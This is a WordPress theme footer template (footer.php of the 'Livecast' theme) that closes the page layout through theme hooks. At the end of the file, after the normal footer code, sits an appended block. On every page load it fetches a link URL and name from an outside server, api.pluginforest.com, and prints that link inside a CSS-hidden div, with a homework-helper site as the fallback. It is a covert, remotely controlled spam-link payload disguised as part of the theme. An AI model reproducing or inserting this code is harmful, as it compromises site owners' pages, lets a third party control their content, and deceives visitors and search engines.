<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #viewport #wrapper #main div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Livecast WordPress Theme
 * @subpackage Templates
 * @since 1.0
 */

?>
        <?php codeless_hook_main_end(); ?>
        
	    </main><!-- #main -->
        
        <?php
        
        /**
         * Functions hooked into codeless_hook_main_after action
         *
         * @hooked codeless_show_footer                     - 0
         */
        codeless_hook_main_after() ?>

	    <?php codeless_hook_wrapper_end() ?>
	    
    </div><!-- #wrapper -->
    
    <?php 

		/**
		 * Functions hooked into codeless_hook_wrapper_after action
		 *
		 * @hooked codeless_creative_search 				- 10 
		 */   
    	codeless_hook_wrapper_after()
    ?>

    <?php 

        /**
         * Functions hooked into codeless_hook_viewport_end action
         *
         * @hooked codeless_layout_bordered                 - 10 
         */ 
        codeless_hook_viewport_end() 

    ?>
    
</div><!-- #viewport -->

<?php codeless_hook_viewport_after() ?>

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>